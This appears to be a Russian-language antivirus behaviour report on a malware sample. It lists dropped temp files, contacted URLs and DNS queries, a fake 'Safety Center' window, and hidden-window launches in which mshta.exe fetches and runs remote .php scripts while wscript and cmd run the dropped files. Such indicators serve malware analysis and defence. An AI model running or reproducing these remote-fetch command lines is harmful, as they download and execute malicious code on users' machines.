Техническая информация
- %TEMP%\temp
- %TEMP%\temp.bat
- %TEMP%\temp.js
- '22#.#3.218.83':80
- http://ur###nam.net/8732489273.php
- http://ww#.##odinam.net/
- http://ww#.##odinam.net/px.gif?ch#######################
- http://www.google.com/adsense/domains/caf.js
- http://ww#.##odinam.net/glp?r=#####################################################################
- DNS ASK ur###nam.net
- DNS ASK ww#.##odinam.net
- DNS ASK google.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- ClassName: 'TForm1' WindowName: 'Safety Center'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\temp.js"
- '%WINDIR%\syswow64\mshta.exe' http://95.##1.27.154/install.php?id#########' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://ur###nam.net/8732489273.php' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\temp.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://95.##1.27.154/install.php?id#########
- '%WINDIR%\syswow64\mshta.exe' http://ur###nam.net/8732489273.php
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\temp.bat" "